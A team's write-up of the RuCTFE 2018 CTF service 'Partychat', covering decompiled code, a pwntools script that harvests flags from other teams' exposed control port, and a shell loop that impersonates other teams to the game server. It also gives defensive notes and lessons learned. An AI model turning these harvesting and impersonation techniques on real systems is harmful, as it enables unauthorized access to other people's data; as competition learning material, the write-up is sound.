RuCTFE 2018 WriteUp Partychat

17 November 2018 by Johannes

Partychat was a binary service providing chat functionality in an unusual architecture.

On our vulnbox we can find two binaries, partychat and partychat-node.

Running partychat-node gives a first hint about the general chat architecture, which we later verified in IDA Pro:

The node connects to a “master endpoint” and then opens a socket to receive control connections.

Further, it also requires a nickname.

root@ructfe2018:/home/partychat# ./partychat-node

Usage:

./partychat-node <master_endpoint> <control_port> <nick_name>

Looking into partychat’s start-up script (run.sh), we can see that the master endpoint is running at 10.10.10.100:16770, i.e., on a central server hosted by Hackerdom.

Also, we see that the control port is 6666, and that our nickname is derived from our team-number, @team82 in our case.
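The arithmetic run.sh uses for this derivation can be replayed in Python. This is only a sketch: the function names and the example address 10.60.82.2 are ours, and the grouping assumes the usual `expr` precedence (`*` and `%` bind tighter than `+` and are evaluated left to right).

```python
def team_number(ip: str) -> int:
    """Mirror run.sh: ((second_octet - 60) * 256) % 1024 + third_octet."""
    parts = [int(p) for p in ip.split(".")]
    # Note: Python's % differs from expr for negative operands, so this
    # only matches the script when the second octet is at least 60.
    return ((parts[1] - 60) * 256) % 1024 + parts[2]


def nickname(ip: str) -> str:
    """Build the default nick the script passes to partychat-node."""
    return f"@team{team_number(ip)}"


if __name__ == "__main__":
    # Hypothetical vulnbox address inside team 82's subnet.
    print(nickname("10.60.82.2"))  # prints "@team82"
```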

#! /bin/bash

ip=`hostname -I | grep -Po '10\.\d+\.\d+\.\d+'`

set -f

parts=(${ip//./ })

team_num=`expr \( \( ${parts[1]} - 60 \) * 256 \) % 1024 + ${parts[2]}`

if [[ -z "$team_num" ]]; then

echo Service is note reday to start yet..

exit 1

fi

nick=${1:-@team$team_num}

master=10.10.10.100:16770

./partychat-node $master 6666 $nick

The second binary, partychat, opens a connection to the local node on 127.0.0.1:6666, displays some nice ASCII art, and provides a console interface to our local node:

root@ructfe2018:/home/partychat# ./partychat

▄▄▄· ▄▄▄· ▄▄▄ ▄▄▄▄▄ ▄· ▄▌ ▄▄· ▄ .▄ ▄▄▄· ▄▄▄▄▄

▐█ ▄█▐█ ▀█ ▀▄ █·•██ ▐█▪██▌▐█ ▌▪██▪▐█▐█ ▀█ •██

██▀·▄█▀▀█ ▐▀▀▄ ▐█.▪▐█▌▐█▪██ ▄▄██▀▐█▄█▀▀█ ▐█.▪

▐█▪·•▐█ ▪▐▌▐█•█▌ ▐█▌· ▐█▀·.▐███▌██▌▐▀▐█ ▪▐▌ ▐█▌·

.▀ ▀ ▀ .▀ ▀ ▀▀▀ ▀ • ·▀▀▀ ▀▀▀ · ▀ ▀ ▀▀▀

Welcome! Type !help if not sure.

> !help

Available commands:

!help - display this message.

!list - see who's online.

!say <message> - say something.

!history <group> - show the history of a conversation.

!quit - exit partychat.

!help>

Flaw #1: why not bind to 0.0.0.0?

By simply observing network traffic, we quickly realized that flags are sent to our node via the master endpoint connection, but are also mirrored to the control client via port 6666.

This is bad, since the control socket of partychat-node is bound to 0.0.0.0:

int __cdecl pc_start_server(uint16_t control_port)

{

int control_sock_fd; // eax@7 MAPDST

__int64 v2; // rcx@7

int optval; // [sp+18h] [bp-28h]@3

struct sockaddr_in control_addr; // [sp+20h] [bp-20h]@3

__int64 v6; // [sp+38h] [bp-8h]@1

v6 = *MK_FP(__FS__, 40LL);

control_sock_fd = socket(2, 1, 0);

if ( control_sock_fd < 0 )

pc_fatal("pc_start_server: failed to create socket.", 1LL);

optval = 1;

setsockopt(control_sock_fd, SOL_SOCKET, SO_REUSEADDR, &optval, 4u);// set reuseaddr

bzero(&control_addr, 0x10uLL);

control_addr.sin_family = AF_INET;

control_addr.sin_port = htons(control_port);

if ( bind(control_sock_fd, &control_addr, 0x10u) >> 31 )

pc_fatal("pc_start_server: failed to bind server socket.", &control_addr);

pc_make_nonblocking(control_sock_fd);

if ( listen(control_sock_fd, 8) >> 31 )

pc_fatal("pc_start_server: failed to listen on server socket.", 8LL);

v2 = *MK_FP(__FS__, 40LL) ^ v6;

return control_sock_fd;

}

Therefore, we can get flags easily by connecting to the control port of other teams and just waiting for other flags:

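from pwn import remote  # pwntools

def exploit(host):
    # Connect to another team's exposed control port.
    r = remote(host, 6666, timeout=10)
    r.sendline("0 list (null) ")
    while True:
        # Flags sent to the node are mirrored to connected control clients.
        result = r.readline(timeout=10).strip()
        if result:
            submitter.submit(result)  # submitter: our flag-submission helper (not shown)

To defend against this attack, blocking access to port 6666 was enough.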

Oddly, the gameserver does not seem to use this control port at all, as our uptime was not affected negatively by this.

On the contrary, blocking port 6666 greatly improved our uptime:

Reversing revealed that partychat-node can only handle 10 control client connections at a time, with further connections effectively stalling the node.
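To illustrate the binding issue, here is a minimal Python sketch of the same socket/setsockopt/bind/listen sequence with a switch between loopback-only and all interfaces. It is not a patch for the binary, and `start_control_server` and its `loopback_only` parameter are names we made up for the illustration.

```python
import socket


def start_control_server(port: int, loopback_only: bool = True) -> socket.socket:
    """Create a listening TCP socket for control connections."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # A zeroed sockaddr_in, as in the decompiled code, means INADDR_ANY,
    # i.e. 0.0.0.0. Binding to 127.0.0.1 keeps remote hosts out.
    host = "127.0.0.1" if loopback_only else "0.0.0.0"
    sock.bind((host, port))
    sock.listen(8)
    return sock


if __name__ == "__main__":
    # Port 0 lets the OS pick a free port for this demo.
    server = start_control_server(0)
    print(server.getsockname()[0])
    server.close()
```

Since the local partychat client connects via 127.0.0.1 anyway, a loopback-only control socket would presumably have served it just as well.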

Flaw #2: I am you

As all interaction with the gameserver happens through the master endpoint connection, we wondered how the gameserver can distinguish between teams.

On node startup, a nickname derived from the team number is provided, but surely they would rather use the IP of our vulnbox, wouldn’t they?

Of course they don’t.

If we could thus trick the gameserver into believing we were another team, we would get all their flags sent to us right away.

Luckily, partychat-node copes rather nicely with running many instances in parallel, and a simple

for i in {1..299}
do
    ./partychat-node 10.10.10.100:16770 $((6666 + i)) "@team"$i &
done

is all that’s needed.

To extract new flags we can now either connect to our new local control sockets or just watch the contents of the history folder.
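Watching the history folder could look roughly like the following sketch. The directory layout and the flag pattern (31 characters from A-Z and 0-9 followed by `=`) are assumptions on our side, and `collect_flags` is a hypothetical helper, not part of the service.

```python
import re
from pathlib import Path

# Assumption: flags are 31 characters from [A-Z0-9] followed by "=".
FLAG_RE = re.compile(r"[A-Z0-9]{31}=")


def collect_flags(history_dir: str, seen: set) -> list:
    """Return flags found under history_dir that are not yet in seen."""
    new_flags = []
    for path in sorted(Path(history_dir).rglob("*")):
        if not path.is_file():
            continue
        text = path.read_text(errors="ignore")
        for flag in FLAG_RE.findall(text):
            if flag not in seen:
                seen.add(flag)
                new_flags.append(flag)
    return new_flags
```

Calling this in a loop with a short sleep and a shared `seen` set hands each flag to the submitter only once.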

As an odd side effect, impersonating inactive teams actually earned them uptime.



Here we managed to connect to the master endpoint as team cow_face, which apparently was inactive for the entire CTF, yet got an uptime of 13% for partychat:

Sadly, since this is a flaw in the service design, there is no patch against it. Even worse, as long as the gameserver believes it has a connection for your team (even if it’s run by someone else), it will discard all further connection attempts for your team.
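The behaviour we observed can be summed up in a toy model. This is our guess at the logic, not the gameserver's actual code; `MasterRegistry` and its methods are hypothetical names, as are the addresses used in the usage example.

```python
class MasterRegistry:
    """Toy model: one active connection per nickname, first claimant wins."""

    def __init__(self):
        # nickname -> source address of the node holding that nickname
        self.connections = {}

    def register(self, nickname: str, source_ip: str) -> bool:
        # Nothing here checks that source_ip belongs to the named team.
        if nickname in self.connections:
            return False  # later attempts for the same nickname are discarded
        self.connections[nickname] = source_ip
        return True

    def deliver_flag(self, nickname: str, flag: str) -> tuple:
        """Return (recipient address, flag) for the node holding nickname."""
        return self.connections[nickname], flag


if __name__ == "__main__":
    registry = MasterRegistry()
    print(registry.register("@team1", "10.60.82.2"))  # impersonator: True
    print(registry.register("@team1", "10.60.1.2"))   # real team: False
```

In this model, a check that the nickname matches the connecting address would close the hole, but that check would have to live on the master side.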

Discussion and lessons learned

Partychat was our problem child during this CTF.

This was partly our own fault, as we owe parts of our downtime to a simple NAT misconfiguration (10.60.82.1 != 10.80.82.1).

Further, partychat was written in C++, which is a bit of a hassle to reverse and required heavy use of IDA’s “create struct” functionality.

Finally, it seems as if the two flaws we exploited were not the flaws originally intended.

The way commands are implemented in partychat seems to allow for some further trickery:

Commands awaiting a response are put into a queue.

Responses are wrapped into a special command type, which then searches the queue for a matching command and invokes its handle_response function.

Commands are identified by a numerical ID, and new commands can have the same IDs as old ones. This could hint at further vulnerabilities where a response to one command triggers the handle_response function of another.
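The suspected confusion can be shown with a toy model of such a queue. We never confirmed this in the binary: the classes below are hypothetical, and both the "first match wins" lookup and the removal of matched commands are assumptions.

```python
from collections import deque


class Command:
    def __init__(self, command_id: int, name: str):
        self.command_id = command_id
        self.name = name
        self.responses = []

    def handle_response(self, payload: str) -> None:
        self.responses.append(payload)


class PendingQueue:
    def __init__(self):
        self.pending = deque()

    def send(self, command: Command) -> None:
        """Queue a command that is waiting for its response."""
        self.pending.append(command)

    def dispatch_response(self, command_id: int, payload: str):
        """Hand payload to the first pending command with a matching ID."""
        match = next((c for c in self.pending if c.command_id == command_id), None)
        if match is not None:
            self.pending.remove(match)
            match.handle_response(payload)
        return match


if __name__ == "__main__":
    queue = PendingQueue()
    queue.send(Command(0, "history"))  # old command, still unanswered
    queue.send(Command(0, "list"))     # new command reusing ID 0
    handled = queue.dispatch_response(0, "reply meant for list")
    print(handled.name)  # prints "history"
```

Here the reply intended for the newer command ends up in the handler of the older one, simply because both share an ID.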

However, even the flaws exploited this time, together with a constant battle for uptime, made this a challenging service and a fun CTF ;-)